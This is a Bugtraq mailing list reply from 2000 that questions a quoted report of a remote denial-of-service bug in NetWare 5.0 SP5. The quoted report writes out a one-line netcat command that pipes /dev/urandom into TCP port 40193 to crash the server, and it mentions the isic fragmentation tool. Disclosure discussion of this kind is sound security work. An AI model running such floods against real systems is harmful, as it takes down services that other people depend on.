[15772] in bugtraq
Re: Remote Denial Of Service -- NetWare 5.0 with SP 5
daemon@ATHENA.MIT.EDU (Conrad Wood)
Thu Jul 13 19:53:11 2000
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <396D8A2E.374F92C5@conradwood.net>
Date: Thu, 13 Jul 2000 10:21:50 +0100
Reply-To: Conrad Wood <conrad@CONRADWOOD.NET>
From: Conrad Wood <conrad@CONRADWOOD.NET>
X-To: dparussalla@baysidegrp.com.au
To: BUGTRAQ@SECURITYFOCUS.COM
40931 is Netware/IP why should that run on NW5???
If you are using "compatibilty mode" - that`s not a supported service and
according to novell should not be used in a production enviroment.
similar to an *experimental dhcp server* on linux ;)
Dimuthu Parussalla wrote:
> Remote Denial Of Service -- NetWare 5.0 with SP 5
> --------------------------------------------------------------
>
> I encounter a buffer overflow bug in NetWare 5.0 with service pack 5. After
> few minutes after the attack server issue a memory allocation error.
>
> 10-07-2000 12:29:53 pm: SERVER-5.0-4631 [nmID=1001C]
> WARNING! Server XXXXX experienced a critical error. The offending
> process was suspended or recovered.
> However, services hosted by this server may have been affected.
>
> I continued the attack another 1/h hr or so. then server issued a Abend
> error and hangs.
>
> 10-07-2000 12:29:53 pm: SERVER-5.0-4631 [nmID=1001C]
> WARNING! Server XXXXX experienced a critical error. The offending
> process was
> suspended or recovered. However, services hosted by this server may
> have been affected.
>
> ATTACK INFO
> -----------------
>
> Using a linux server connected to the same network. I did the following
>
> [root@tik /root]# cat /dev/urandom |nc 192.168.1.15 40193
>
> NetWare TCP port 40193 doesn't handle frag TCP packets as well. using isic I
> got the same results
>
> FIX
> -----
>
> No FIX yet
